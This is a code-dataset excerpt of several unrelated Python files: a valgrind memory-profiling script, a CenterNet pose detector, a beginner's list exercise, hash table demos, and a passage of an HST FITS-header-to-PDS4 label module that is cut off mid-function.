msparser\nimport os\nimport signal\nimport subprocess\nimport sys\nimport time\nfrom tabulate import tabulate\n\nagent_sp = subprocess.Popen([\"./install/bin/agent-profiling\"], shell=True)\ntime.sleep(1)\nsub_sp = subprocess.Popen([\"./install/bin/subscriber-profiling 1 topic_name\"], shell=True)\npub_sp = subprocess.Popen((\"valgrind --tool=massif --stacks=yes --detailed-freq=1 --max-snapshots=300 --threshold=1.0 --massif-out-file=./massif-publisher.out ./install/bin/publisher-profiling 2 topic_name 8\").split(), shell=False)\n\ntime.sleep(5)\n\npub_sp.send_signal(signal.SIGINT)\nsub_sp.terminate()\nagent_sp.terminate()\ntime.sleep(1)\n\nstd_heap_usage = 0\ndata = msparser.parse_file('massif-publisher.out')\npeak_index = data['peak_snapshot_index']\npeak_snapshot = data['snapshots'][peak_index]\nfor c in peak_snapshot['heap_tree']['children']:\n if c['details'] and c['details']['function'] == '???':\n std_heap_usage = c['nbytes']\n\nstack_usage = round((peak_snapshot['mem_stack'] / 1000), 2)\nheap_usage = round((peak_snapshot['mem_heap'] / 1000), 2)\ntotal_usage = round(((peak_snapshot['mem_stack'] + peak_snapshot['mem_heap'] + peak_snapshot['mem_heap_extra'] - std_heap_usage) / 1000), 2)\n\nprint(\"stack usage: \", stack_usage)\nprint(\"heap usage: \", heap_usage)\nprint(\"total usage: \", total_usage)","sub_path":"test/profiling/publisher-profiling.py","file_name":"publisher-profiling.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"507980085","text":"import cv2\nimport numpy as np\nimport time\n\nimport sys\nsys.path.insert(0, \"/Users/guanghan.ning/Desktop/dev/CenterNet-Gluon/\")\n\nfrom external.nms import soft_nms_39\nfrom models.tensor_utils import flip_tensor, flip_lr_off, flip_lr\n\nfrom detectors.base_detector import BaseDetector\n\nfrom models.decoder import decode_centernet_pose\nfrom utils.post_process import multi_pose_post_process\nfrom mxnet import nd\n\n\nclass PoseDetector(BaseDetector):\n def __init__(self, opt):\n super(PoseDetector, self).__init__(opt)\n self.flip_idx = opt.flip_idx\n\n '''\n def process(self, images, return_time=False):\n output = self.model(images)[-1]\n # 0: hm, 1: wh, 2: hps, 3: reg, 4: hm_hp, 5:hp_offset\n output[0] = output[0].sigmoid()\n\n if self.opt.hm_hp and not self.opt.mse_loss:\n output[4] = output[4].sigmoid()\n\n reg = output[3] if self.opt.reg_offset else None\n hm_hp = output[4] if self.opt.hm_hp else None\n hp_offset = output[5] if self.opt.reg_hp_offset else None\n\n nd.waitall()\n forward_time = time.time()\n\n if self.opt.flip_test:\n output[0] = (output[0][0:1] + flip_tensor(output[0][1:2])) / 2\n output[1] = (output[1][0:1] + flip_tensor(output[1][1:2])) / 2\n output[2] = (output[2][0:1] + flip_lr_off(output[2][1:2], self.flip_idx)) / 2\n hm_hp = (hm_hp[0:1] + flip_lr(hm_hp[1:2], self.flip_idx)) / 2 if hm_hp is not None else None\n reg = reg[0:1] if reg is not None else None\n hp_offset = hp_offset[0:1] if hp_offset is not None else None\n\n dets = decode_centernet_pose(output[0], output[1], output[2], reg=reg, hm_hp=hm_hp, hp_offset=hp_offset, K=self.opt.K)\n\n if return_time:\n return output, dets, forward_time\n else:\n return output, dets\n '''\n def save_symbols(self, image_or_path_or_tensor, meta=None):\n load_time, pre_time, net_time, dec_time, post_time = 0, 0, 0, 0, 0\n merge_time, tot_time = 0, 0\n start_time = time.time()\n pre_processed = False\n if isinstance(image_or_path_or_tensor, np.ndarray):\n image = image_or_path_or_tensor\n elif type(image_or_path_or_tensor) == type (''):\n image = cv2.imread(image_or_path_or_tensor)\n else:\n image = image_or_path_or_tensor['image'][0].numpy()\n pre_processed_images = image_or_path_or_tensor\n pre_processed = True\n\n loaded_time = time.time()\n load_time += (loaded_time - start_time)\n\n detections = []\n for scale in self.scales:\n scale_start_time = time.time()\n if not pre_processed:\n images, meta = self.pre_process(image, scale, meta)\n else:\n images = pre_processed_images['images'][scale][0]\n meta = pre_processed_images['meta'][scale]\n meta = {k: v.numpy()[0] for k, v in meta.items()}\n\n images = images.as_in_context(self.ctx)\n\n\n dets = self.model(images)\n print(\"Saving symbols\")\n dets.save(\"symbol-detections.json\")\n return\n\n\n def process(self, images, return_time=False):\n print(\"images.shape\", images.shape)\n dets = self.model(images)\n print(\"dets.shape = \", dets.shape)\n print(\"type: \", type(dets))\n #nd.waitall()\n forward_time = time.time()\n if return_time:\n return None, dets, forward_time\n else:\n return None, dets\n\n\n def post_process(self, dets, meta, scale=1):\n dets = dets.asnumpy()\n dets = multi_pose_post_process(dets.copy(), [meta['c']], [meta['s']], meta['out_height'], meta['out_width'])\n\n for j in range(1, self.num_classes + 1):\n dets[0][j] = np.array(dets[0][j], dtype=np.float32).reshape(-1, 39)\n dets[0][j][:, :4] /= scale\n dets[0][j][:, 5:] /= scale\n return dets[0]\n\n def merge_outputs(self, detections):\n results = {}\n results[1] = np.concatenate([detection[1] for detection in detections], axis=0).astype(np.float32)\n if self.opt.nms or len(self.opt.test_scales) > 1:\n soft_nms_39(results[1], Nt=0.5, method=2)\n results[1] = results[1].tolist()\n return results\n","sub_path":"detectors/pose_detector_symbol_with_decoder.py","file_name":"pose_detector_symbol_with_decoder.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"553480402","text":"listmarcas = []\nlistprecios = []\nn = int(input(\"Dame el numero de pantalones en el ropero: \"))\nx = int(input(\"Dame el numero de pantalones al que deseas llegar: \"))\n\nfor i in range(n):\n listmarcas.append(input(\"marca del pantalon: \"))\n listprecios.append(int(input(\"precio del pantalon: \")))\n\nfor i in range(n):\n print(listmarcas[i],listprecios[i])\n\nmarcas = {}\n\nfor i in range(n):\n if listmarcas[i] in marcas:\n marcas[listmarcas[i]] += 1\n else:\n marcas[listmarcas[i]] = 1\n\nprint(marcas)\n\nnombremarcas = list(marcas.keys())\n\nnumeromarca = list(marcas.values())\n\nprint(nombremarcas,numeromarca)\n\nfor i in range(n):\n for j in range(n):\n if listprecios[i] > listprecios[j]:\n marcas = listmarcas[i]\n listmarcas[i] = listmarcas[j]\n listmarcas[j] = marcas\n precios = listprecios[i]\n listprecios[i] = listprecios[j]\n listprecios[j] = precios\n\nfor i in range(n):\n print(listmarcas[i],listprecios[i])\n\nvent_total = int()\n\n#for i in range(n):\n# if listmarcas[i] in marcas:\n# if n > x:\n# vent_total = listprecios[i]\n #marcas[listmarcas[i]] -= 1\n# del listmarcas[i]\n# del listprecios[i]\n# n -= 1\n# i -= 1\n\nlistmarcasvend = []\nlistpreciosvent = []\n\nwhile i < len(nombremarcas):\n if n > x:\n for j in range(n):\n if nombremarcas[j] == listmarcas[i]:\n if numeromarca[i] > 1:\n listmarcasvend[j] = listmarcas[j]\n listpreciosvent[j] = listprecios[j]\n vent_total = listprecios[j]\n del listmarcas[j]\n del listprecios[j]\n j -= 1\n n -= 1\n\nfor i in range(len(listmarcasvend)):\n print(listmarcasvend[i],listpreciosvent[i])\n\nprint(marcas)\n\nfor i in range(n):\n print(listmarcas[i],listprecios[i])\n\nprint(vent_total)\n","sub_path":"ago-dic-2019/Ricardo/Practica2/practica2.py","file_name":"practica2.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"624559453","text":"#encoding = utf-8\n\"\"\"\n@version:0.1\n@author: jorian\n@time: 2020/12/4 13:21\n\"\"\"\n\n\nclass hashtable(object):\n def __init__(self):\n self.items=[None]*100\n\n def hash(self,a):\n return a*1+1 # 线性映射关系\n\n def put(self,k,v):\n # 根据哈希结果,添加映射关系\n self.items[self.hash(k)] = v\n\n def get(self,k):\n hashcode=self.hash(k)\n # 根据哈希结果,返回正确匹配出结果\n return self.items[hashcode]\n\nclass hashtable(object):\n def __init__(self):\n self.capacity = 10\n self.hash_table = [[None, None]for i in range(self.capacity)]\n self.num = 0\n self.load_factor = 0.75\n\n def hash(self, k, i):\n h_value = (k+i) % self.capacity\n if self.hash_table[h_value][0] == k:\n return h_value\n if self.hash_table[h_value][0] != None:\n i = i+1\n h_value = self.hash(k, i)\n return h_value\n\n def resize(self):\n # 扩容���原有元素数量的两倍\n self.capacity = self.num*2\n temp = self.hash_table[:]\n self.hash_table = [[None, None]for i in range(self.capacity)]\n for i in temp:\n # 把原来已有的元素存入\n if(i[0] != None):\n hash_v = self.hash(i[0], 0)\n self.hash_table[hash_v][0] = i[0]\n self.hash_table[hash_v][1] = i[1]\n\n def put(self, k, v):\n hash_v = self.hash(k, 0)\n self.hash_table[hash_v][0] = k\n self.hash_table[hash_v][1] = v\n # 暂不考虑 key 重复的情况,具体自己可以优化\n self.num = self.num+1\n # 如果比例大于载荷因子\n if(self.num/len(self.hash_table) > self.load_factor):\n self.resize()\n\n def get(self, k):\n hash_v = self.hash(k, 0)\n return self.hash_table[hash_v][1]\n\n\ntable = hashtable()\nfor i in range(1, 13):\n table.put(i, i)\nprint(table.get(3))\nprint(table.hash_table)","sub_path":"hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"113696563","text":"\"\"\"\nFunctionality to build an ```` XML element using a SQLite\ndatabase.\n\"\"\"\nimport julian\n\nfrom typing import Any, Dict, List, Tuple\n\nfrom pdart.labels.hst_parameters_xml import (\n detector_id,\n moving_target_description,\n moving_target_keyword,\n targeted_detector_id,\n hst_parameters,\n program_parameters,\n instrument_parameters,\n pointing_parameters,\n tracking_parameters,\n exposure_parameters,\n wavelength_filter_grating_parameters,\n operational_parameters,\n)\nfrom pdart.labels.lookup import Lookup, merge_two_hdu_lookups\nfrom pdart.xml.templates import (\n FragBuilder,\n NodeBuilder,\n NodeBuilderTemplate,\n combine_nodes_into_fragment,\n)\n\nWFPC2_DETECTOR_IDS = {1: \"PC1\", 2: \"WF2\", 3: \"WF3\", 4: \"WF4\"}\n# All functions have the same input arguments:\n# data_lookups: List[Lookup]\n# a list of all the FITS headers in a data file (raw, d0f, drz, etc.)\n# shm_lookup: Lookup\n# the first fits header of the associated _shm.fits file\n# or _spt.fits file.\n# The second argument is needed because sometimes the data file does not contain\n# all the info we need.\n\n\ndef fname(lookup: Lookup) -> str:\n \"\"\"\n Not used as an attribute but needed for error messages\n \"\"\"\n try:\n return lookup[\"FILENAME\"].strip()\n except KeyError:\n pass\n # GHRS, at least, does not contain FILENAME, but ROOTNAME is good enough\n return lookup[\"ROOTNAME\"].strip().lower() + \"x_xxx.fits\"\n\n\n##############################\n# get_aperture_name\n##############################\ndef get_aperture_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n instrument = get_instrument_id(data_lookups, shm_lookup)\n if instrument in (\"WF/PC\", \"WFPC2\", \"HSP\"):\n return shm_lookup[\"APER_1\"].strip()\n if instrument == \"FOS\":\n return shm_lookup[\"APER_ID\"]\n # This is valid for most instruments\n try:\n return data_lookups[0][\"APERTURE\"].strip()\n except KeyError:\n pass\n raise ValueError(\"missing aperture for \" + fname(shm_lookup))\n\n\n##############################\n# get_bandwidth\n##############################\ndef get_bandwidth(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return a float for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n # Works for STIS and WFPC2\n try:\n return \"%.4f\" % (float(lookup[\"BANDWID\"]) * 1.0e-4)\n except KeyError:\n return \"0.\"\n\n\n##############################\n# get_binning_mode\n##############################\ndef get_binning_mode(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n # WF/PC and WFPC2 are special cases\n if instrument in (\"WF/PC\", \"WFPC2\"):\n obsmode = lookup[\"MODE\"].strip()\n if obsmode == \"FULL\":\n return \"1\"\n else: # obsmode == \"AREA\"\n return \"2\"\n # Binning info can be in the first or second FITS header\n for lookup in data_lookups[:2]:\n try:\n binaxis1 = lookup[\"BINAXIS1\"]\n binaxis2 = lookup[\"BINAXIS2\"]\n return str(max(binaxis1, binaxis2))\n except KeyError:\n pass\n return \"1\"\n\n\n##############################\n# get_center_filter_wavelength\n##############################\ndef get_center_filter_wavelength(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return a float for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n # Works for STIS and WFPC2\n try:\n return \"%.4f\" % (float(lookup[\"CENTRWV\"]) * 1.0e-4)\n except KeyError:\n return \"0.\"\n\n\n##############################\n# get_channel_id\n##############################\ndef get_channel_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n if instrument == \"NICMOS\":\n result = \"NIC\" + str(lookup[\"CAMERA\"])\n elif instrument == \"WF/PC\":\n result = lookup[\"CAMERA\"].strip()\n else:\n try:\n ccd = lookup[\"DETECTOR\"].strip()\n if instrument == \"WFPC2\":\n return WFPC2_DETECTOR_IDS[ccd]\n else:\n return ccd\n except KeyError:\n result = instrument\n\n return result\n\n\n##############################\n# get_coronagraph_flag\n##############################\ndef get_coronagraph_flag(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n instrument = get_instrument_id(data_lookups, shm_lookup)\n aperture = get_aperture_name(data_lookups, shm_lookup)\n if instrument == \"ACS\":\n if aperture.startswith(\"HRC-CORON\") or aperture.startswith(\"HRC-OCCULT\"):\n return \"true\"\n if instrument == \"STIS\":\n if (\n aperture == \"50CORON\"\n or aperture.startswith(\"BAR\")\n or aperture.startswith(\"WEDGE\")\n or aperture.startswith(\"52X0.2F1\")\n ):\n return \"true\"\n if instrument == \"NICMOS\":\n if aperture == \"NIC2-CORON\":\n return \"true\"\n return \"false\"\n\n\n##############################\n# get_cosmic_ray_split_count\n##############################\ndef get_cosmic_ray_split_count(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n return str(lookup[\"CRSPLIT\"])\n except KeyError:\n return \"1\" # no CR-splitting unless explicitly stated\n\n\n##############################\n# get_detector_ids\n##############################\n\n\ndef get_detector_ids(data_lookups: List[Lookup], shm_lookup: Lookup) -> List[str]:\n \"\"\"\n Return a list of zero or more text values for the ````\n XML elements.\n \"\"\"\n # Interior function\n def get_ccds_from_lookups(data_lookups: List[Lookup], fitsname: str) -> List[int]:\n ccds: List[int] = []\n for lookup in data_lookups:\n try:\n ccdchip = int(lookup[fitsname])\n ccds.append(ccdchip)\n except KeyError:\n pass\n ccds = list(set(ccds)) # select unique values\n ccds.sort()\n return ccds\n\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n channel = get_channel_id(data_lookups, shm_lookup)\n if instrument == \"ACS\" and channel == \"WFC\":\n ccds = get_ccds_from_lookups(data_lookups, \"CCDCHIP\")\n if -999 in ccds:\n ccds = [1, 2]\n result = [f\"WFC{k}\" for k in ccds]\n elif instrument == \"COS\" and channel == \"FUV\":\n segment = lookup[\"SEGMENT\"].strip()\n if segment not in (\"FUVA\", \"FUVB\", \"BOTH\"):\n raise ValueError(\n \"unrecognized segment (%s) in %s\" % (segment, fname(lookup))\n )\n if segment == \"FUVA\":\n result = [\"FUVA\"]\n elif segment == \"FUVB\":\n result = [\"FUVB\"]\n else:\n result = [\"FUVA\", \"FUVB\"]\n elif instrument == \"GHRS\":\n result = [\"GHRS\" + str(lookup[\"DETECTOR\"])]\n elif instrument == \"HSP\":\n config = shm_lookup[\"CONFIG\"].strip()\n # Example: config = HSP/UNK/VIS\n parts = config.split(\"/\")\n if parts[0] != \"HSP\":\n raise ValueError(f\"Invalid CONFIG value in {fname(lookup)}.\")\n result = [p for p in parts[1:] if p != \"UNK\"]\n elif instrument == \"WFC3\" and channel == \"UVIS\":\n ccds = get_ccds_from_lookups(data_lookups, \"CCDCHIP\")\n if -999 in ccds:\n ccds = [1, 2]\n result = [f\"UVIS{k}\" for k in ccds]\n elif instrument == \"WF/PC\":\n # We will need to find a workaround to read the FITS table from the data\n # file, because that is the only way to get the actual set of detectors\n # if there are less than four! I hope it just doesn't come up.\n count = lookup[\"NAXIS3\"]\n if count != 4:\n raise ValueError(\n \"unknown detector subset in (%d/4) in %s\" % (count, fname(lookup))\n )\n if channel not in (\"PC\", \"WFC\"):\n raise ValueError(f\"Bad channel for {fname(lookup)}.\")\n if channel == \"WFC\":\n result = [\"WF1\", \"WF2\", \"WF3\", \"WF4\"]\n else:\n result = [\"PC5\", \"PC6\", \"PC7\", \"PC8\"]\n elif instrument == \"WFPC2\":\n ccds = get_ccds_from_lookups(data_lookups, \"DETECTOR\")\n result = [WFPC2_DETECTOR_IDS[k] for k in ccds]\n # Otherwise, return the single value of channel_id\n else:\n result = [channel]\n\n return result\n\n\n##############################\n# get_exposure_duration\n##############################\ndef get_exposure_duration(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return a float for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n return str(lookup[\"EXPTIME\"])\n except KeyError:\n return str(lookup[\"TEXPTIME\"])\n\n\n##############################\n# get_exposure_type\n##############################\ndef get_exposure_type(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n return lookup[\"EXPFLAG\"].strip()\n\n\n##############################\n# get_filter_name\n##############################\ndef get_filter_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n if instrument == \"ACS\":\n filter1 = lookup[\"FILTER1\"].strip()\n filter2 = lookup[\"FILTER2\"].strip()\n if filter1.startswith(\"CLEAR\"):\n if filter2.startswith(\"CLEAR\") or filter2 == \"N/A\":\n return \"CLEAR\"\n else:\n return filter2\n if filter2.startswith(\"CLEAR\") or filter2 == \"N/A\":\n return filter1\n # At this point, both filters start with \"F\" followed by three digits,\n # or \"POL\" for polarizers. Sort by increasing wavelength; put\n # polarizers second; join with a plus.\n filters = [filter1, filter2]\n filters.sort()\n return \"+\".join(filters)\n if instrument == \"FOC\":\n filters = [\n lookup[\"FILTER1\"].strip(),\n lookup[\"FILTER2\"].strip(),\n lookup[\"FILTER3\"].strip(),\n lookup[\"FILTER4\"].strip(),\n ]\n filters = [f for f in filters if not f.startswith(\"CLEAR\")]\n filters.sort()\n return \"+\".join(filters)\n if instrument in (\"FOS\", \"HSP\"):\n return shm_lookup[\"SPEC_1\"].strip()\n if instrument == \"GHRS\":\n return lookup[\"GRATING\"].strip()\n if instrument == \"STIS\":\n opt_elem = lookup[\"OPT_ELEM\"].strip()\n filter = lookup[\"FILTER\"].strip().upper().replace(\" \", \"_\")\n if filter == \"CLEAR\":\n return opt_elem\n else:\n return opt_elem + \"+\" + filter\n if instrument in (\"WF/PC\", \"WFPC2\"):\n filtnam1 = lookup[\"FILTNAM1\"].strip()\n filtnam2 = lookup[\"FILTNAM2\"].strip()\n if filtnam1 == \"\":\n return filtnam2\n if filtnam2 == \"\":\n return filtnam1\n # At this point, both filters start with \"F\", followed by three digits.\n # Put lower value first; join with a plus.\n filters = [filtnam1, filtnam2]\n filters.sort()\n return \"+\".join(filters)\n # For other instruments there is just zero or one filter\n try:\n return lookup[\"FILTER\"].strip()\n except KeyError:\n return \"Not applicable\"\n\n\n##############################\n# get_fine_guidance_sensor_lock_type\n##############################\ndef get_fine_guidance_sensor_lock_type(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n return lookup[\"FGSLOCK\"].strip()\n\n\n##############################\n# get_gain_setting\n##############################\ndef get_gain_setting(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n # Works for WFPC2\n try:\n wfpc2_gain: int = int(float(lookup[\"ATODGAIN\"])) # format WFPC2 gains as ints\n # Need to specifically check this to avoid causing issues on STIS/NUV-MAMA\n if instrument == \"WFPC2\":\n if wfpc2_gain in (7, 15):\n return str(wfpc2_gain)\n raise ValueError(\n \"unrecognized WFPC2 gain (%d) in %s\" % (wfpc2_gain, fname(lookup))\n )\n else:\n # For STIS/NUV-MAMA\n return str(wfpc2_gain)\n except KeyError:\n pass\n # Works for ACS, WFC3, others\n try:\n gain: float = float(lookup[\"CCDGAIN\"])\n return \"%3.1f\" % gain # format other gains with one decimal\n except KeyError:\n pass\n return \"0.\"\n\n\n##############################\n# get_gyroscope_mode\n##############################\ndef get_gyroscope_mode(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n return str(lookup[\"GYROMODE\"]).strip().replace(\"T\", \"3\")\n except KeyError:\n return \"3\" # Three-gyro mode unless otherwise specified\n\n\n##############################\n# get_hst_pi_name\n##############################\ndef get_hst_pi_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n # Usually in the first FITS header, but in the shm header for GHRS\n for lookup in (data_lookups[0], shm_lookup):\n try:\n pr_inv_l = lookup[\"PR_INV_L\"].strip()\n pr_inv_f = lookup[\"PR_INV_F\"].strip()\n try:\n pr_inv_m = lookup[\"PR_INV_M\"].strip()\n except KeyError:\n pr_inv_m = \"\"\n return f\"{pr_inv_l}, {pr_inv_f} {pr_inv_m}\".strip()\n except KeyError:\n pass\n raise ValueError(\"missing PR_INV_L in \" + fname(data_lookups[0]))\n\n\n##############################\n# get_hst_proposal_id\n##############################\ndef get_hst_proposal_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n return str(lookup[\"PROPOSID\"])\n\n\n##############################\n# get_hst_target_name\n##############################\ndef get_hst_target_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n return lookup[\"TARGNAME\"]\n\n\n##############################\n# get_instrument_id\n##############################\ndef get_instrument_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = lookup[\"INSTRUME\"].strip()\n if instrument == \"HRS\":\n return \"GHRS\"\n if instrument == \"WFPC\":\n return \"WF/PC\"\n return instrument\n\n\n##############################\n# get_instrument_mode_id\n##############################\ndef get_instrument_mode_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n if instrument in (\"WF/PC\", \"WFPC2\"):\n return lookup[\"MODE\"].strip()\n if instrument == \"FOC\":\n return lookup[\"OPTCRLY\"].strip()\n if instrument == \"HSP\":\n return shm_lookup[\"OPMODE\"].strip()\n # For most HST instrumnents, this should work...\n try:\n return lookup[\"OBSMODE\"].strip()\n except KeyError:\n pass\n raise ValueError(\"instrument_mode_id not found for \" + fname(lookup))\n\n\n##############################\n# get_mast_observation_id\n##############################\ndef get_mast_observation_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n KEYS = [\"ROOTNAME\", \"ASN_ID\"]\n for keyword in KEYS:\n try:\n return lookup[keyword].strip().lower()\n except KeyError:\n pass\n\n raise RuntimeError(f\"lookup = {lookup}, shm_lookup = {shm_lookup}\")\n\n\n##############################\n# get_moving_target_descriptions\n##############################\ndef get_moving_target_descriptions(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> List[str]:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n # Defined by \"MT_LV_n\" keyword values in the _shm.fits files\n descs = []\n for k in range(1, 10):\n keyword = \"MT_LV_\" + str(k)\n try:\n value = shm_lookup[keyword].strip()\n descs.append(value)\n except KeyError:\n break\n if descs:\n return descs\n else:\n return [\"Not applicable\"]\n\n\n##############################\n# get_moving_target_keywords\n##############################\ndef get_moving_target_keywords(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> List[str]:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n # Defined by \"TARKEYn\" keyword values in the _shm.fits files\n keywords = []\n for k in range(1, 10):\n keyword = \"TARKEY\" + str(k)\n try:\n value = shm_lookup[keyword].strip()\n keywords.append(value)\n except KeyError:\n break\n if keywords:\n return keywords\n else:\n return [\"Not applicable\"]\n\n\n##############################\n# get_moving_target_flag\n##############################\ndef get_moving_target_flag(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n # Usually in the first FITS header, but in the shm header for GHRS\n for lookup in (data_lookups[0], shm_lookup):\n try:\n value = lookup[\"MTFLAG\"].strip()\n if value in (\"T\", \"1\"):\n return \"true\"\n if value in (\"F\", \"\", \"0\"):\n return \"false\"\n else:\n raise ValueError(\n f\"unrecognized MTFLAG value ({value}: {type(value)}) for {fname(data_lookups[0])}\"\n )\n except KeyError:\n pass\n raise ValueError(\"missing MTFLAG value for %s\" % fname(data_lookups[0]))\n\n\n##############################\n# get_observation_type\n##############################\ndef get_observation_type(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n obstype = lookup[\"OBSTYPE\"].strip()\n if obstype not in (\"IMAGING\", \"SPECTROGRAPHIC\"):\n obstype = \"\"\n except KeyError:\n obstype = \"\"\n if not obstype:\n instrument = get_instrument_id(data_lookups, shm_lookup)\n if instrument in (\"ACS\", \"NICMOS\", \"WFC3\", \"WF/PC\", \"WFPC2\"):\n obstype = \"IMAGING\"\n elif instrument in (\"COS\", \"FOS\", \"GHRS\"):\n obstype = \"SPECTROGRAPHIC\"\n elif instrument == \"HSP\":\n obstype = \"TIME-SERIES\"\n else:\n raise ValueError(\"missing OBSTYPE in \" + fname(lookup))\n return obstype\n\n\n##############################\n# get_proposed_aperture_name\n##############################\ndef get_proposed_aperture_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n res = lookup[\"PROPAPER\"].strip() # only a few instruments distinguish\n if res:\n return res\n else:\n return get_aperture_name(data_lookups, shm_lookup)\n except KeyError:\n return get_aperture_name(data_lookups, shm_lookup)\n\n\n##############################\n# get_repeat_exposure_count\n##############################\ndef get_repeat_exposure_count(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n return str(lookup[\"NRPTEXP\"])\n except KeyError:\n return \"1\"\n\n\n##############################\n# get_plate_scale\n##############################\nPLATE_SCALES = { # plate scales in arcsec/pixel\n (\"ACS\", \"HRC\"): 0.026,\n (\"ACS\", \"SBC\"): 0.032,\n (\"ACS\", \"WFC1\"): 0.05,\n (\"ACS\", \"WFC2\"): 0.05,\n (\"FOC\", \"FOC\"): 0.014,\n (\"NICMOS\", \"NIC1\"): 0.042,\n (\"NICMOS\", \"NIC2\"): 0.075,\n (\"NICMOS\", \"NIC3\"): 0.2,\n (\"WF/PC\", \"WFC\"): 0.1016,\n (\"WF/PC\", \"PC\"): 0.0439,\n (\"WFPC2\", \"PC1\"): 0.046,\n (\"WFPC2\", \"WF2\"): 0.1,\n (\"WFPC2\", \"WF3\"): 0.1,\n (\"WFPC2\", \"WF4\"): 0.1,\n}\n\n\ndef get_plate_scale(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n # Works for STIS\n try:\n return str(lookup[\"PLATESC\"])\n except KeyError:\n pass\n # Works for any instrument tabulated in the PLATE_SCALEs dictionary above\n instrument = get_instrument_id(data_lookups, shm_lookup)\n detectors = get_detector_ids(data_lookups, shm_lookup)\n scale = SCALE_MAX = 1.0e99\n for detector in detectors:\n key = (instrument, detector)\n if key in PLATE_SCALES:\n scale = min(scale, 